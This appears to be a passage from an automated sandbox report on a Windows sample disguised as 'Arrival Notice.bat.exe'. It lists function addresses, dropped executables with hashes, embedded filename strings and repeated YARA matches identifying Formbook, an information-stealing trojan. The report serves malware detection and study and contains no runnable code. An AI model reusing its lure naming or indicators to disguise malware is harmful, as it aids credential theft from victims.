              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_082247C00_2_082247C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004100038_2_00410003
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004169838_2_00416983
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0042D9A38_2_0042D9A3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004102238_2_00410223
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004012308_2_00401230
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0040E2A38_2_0040E2A3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004033408_2_00403340
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004026908_2_00402690
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00402F708_2_00402F70
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0040FFFC8_2_0040FFFC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016081588_2_01608158
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015701008_2_01570100
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161A1188_2_0161A118
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016381CC8_2_016381CC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016341A28_2_016341A2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016401AA8_2_016401AA
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016120008_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163A3528_2_0163A352
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016403E68_2_016403E6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E3F08_2_0158E3F0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016202748_2_01620274
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016002C08_2_016002C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015805358_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016405918_2_01640591
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016324468_2_01632446
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016244208_2_01624420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162E4F68_2_0162E4F6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A47508_2_015A4750
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015807708_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157C7C08_2_0157C7C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159C6E08_2_0159C6E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015969628_2_01596962
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0164A9A68_2_0164A9A6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015829A08_2_015829A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158A8408_2_0158A840
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015828408_2_01582840
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE8F08_2_015AE8F0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015668B88_2_015668B8
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163AB408_2_0163AB40
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01636BD78_2_01636BD7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157EA808_2_0157EA80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158AD008_2_0158AD00
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161CD1F8_2_0161CD1F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157ADE08_2_0157ADE0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01598DBF8_2_01598DBF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580C008_2_01580C00
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570CF28_2_01570CF2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01620CB58_2_01620CB5
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F4F408_2_015F4F40
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01622F308_2_01622F30
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A0F308_2_015A0F30
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015C2F288_2_015C2F28
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01572FC88_2_01572FC8
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FEFA08_2_015FEFA0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580E598_2_01580E59
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163EE268_2_0163EE26
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163EEDB8_2_0163EEDB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01592E908_2_01592E90
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163CE938_2_0163CE93
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0164B16B8_2_0164B16B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156F1728_2_0156F172
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B516C8_2_015B516C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158B1B08_2_0158B1B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163F0E08_2_0163F0E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016370E98_2_016370E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015870C08_2_015870C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162F0CC8_2_0162F0CC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156D34C8_2_0156D34C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163132D8_2_0163132D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015C739A8_2_015C739A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016212ED8_2_016212ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159B2C08_2_0159B2C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015852A08_2_015852A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016375718_2_01637571
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016495C38_2_016495C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161D5B08_2_0161D5B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015714608_2_01571460
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163F43F8_2_0163F43F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163F7B08_2_0163F7B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015C56308_2_015C5630
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016316CC8_2_016316CC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015899508_2_01589950
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159B9508_2_0159B950
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016159108_2_01615910
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015ED8008_2_015ED800
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015838E08_2_015838E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163FB768_2_0163FB76
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015BDBF98_2_015BDBF9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F5BF08_2_015F5BF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159FB808_2_0159FB80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01637A468_2_01637A46
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163FA498_2_0163FA49
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F3A6C8_2_015F3A6C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162DAC68_2_0162DAC6
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01621AA38_2_01621AA3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161DAAC8_2_0161DAAC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015C5AA08_2_015C5AA0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01637D738_2_01637D73
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01583D408_2_01583D40
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01631D5A8_2_01631D5A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159FDC08_2_0159FDC0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F9C328_2_015F9C32
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163FCF28_2_0163FCF2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163FF098_2_0163FF09
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01543FD58_2_01543FD5
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01543FD28_2_01543FD2
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01581F928_2_01581F92
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163FFB18_2_0163FFB1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01589EB08_2_01589EB0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 9_2_00F1D5BC9_2_00F1D5BC
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014F010013_2_014F0100
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0154600013_2_01546000
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_015802C013_2_015802C0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150053513_2_01500535
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0152475013_2_01524750
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150077013_2_01500770
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014FC7C013_2_014FC7C0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0151C6E013_2_0151C6E0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0151696213_2_01516962
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_015029A013_2_015029A0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150A84013_2_0150A840
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150284013_2_01502840
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0152E8F013_2_0152E8F0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153889013_2_01538890
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014E68B813_2_014E68B8
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014FEA8013_2_014FEA80
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150ED7A13_2_0150ED7A
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150AD0013_2_0150AD00
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01508DC013_2_01508DC0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014FADE013_2_014FADE0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01518DBF13_2_01518DBF
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01500C0013_2_01500C00
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014F0CF213_2_014F0CF2
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01574F4013_2_01574F40
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01520F3013_2_01520F30
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01542F2813_2_01542F28
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014F2FC813_2_014F2FC8
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0157EFA013_2_0157EFA0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01500E5913_2_01500E59
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01512E9013_2_01512E90
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014EF17213_2_014EF172
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153516C13_2_0153516C
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150B1B013_2_0150B1B0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014ED34C13_2_014ED34C
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_015033F313_2_015033F3
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0151B2C013_2_0151B2C0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0151D2F013_2_0151D2F0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_015052A013_2_015052A0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_014F146013_2_014F1460
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_015474E013_2_015474E0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150349713_2_01503497
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150B73013_2_0150B730
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150995013_2_01509950
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0151B95013_2_0151B950
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0150599013_2_01505990
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0156D80013_2_0156D800
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_015038E013_2_015038E0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01575BF013_2_01575BF0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0153DBF913_2_0153DBF9
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0151FB8013_2_0151FB80
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01573A6C13_2_01573A6C
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01503D4013_2_01503D40
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_0151FDC013_2_0151FDC0
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01579C3213_2_01579C32
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01519C2013_2_01519C20
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01501F9213_2_01501F92
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: 13_2_01509EB013_2_01509EB0
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe 795551251C9B793C9E834D3EE0764B6D29D9B6716EF78349CB771AB462DDF104
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\-6qxw.exe 795551251C9B793C9E834D3EE0764B6D29D9B6716EF78349CB771AB462DDF104
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: String function: 0156EA12 appears 36 times
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeCode function: String function: 01547E54 appears 96 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: String function: 015EEA12 appears 86 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: String function: 015B5130 appears 58 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: String function: 0156B970 appears 280 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: String function: 015C7E54 appears 110 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: String function: 015FF290 appears 103 times
              Source: Arrival Notice.bat.exe, 00000000.00000002.1736485863.0000000008160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1728793869.0000000005FE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1706016711.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1708194861.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000008.00000002.2004379005.000000000166D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exeBinary or memory string: OriginalFilenametZby.exe. vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
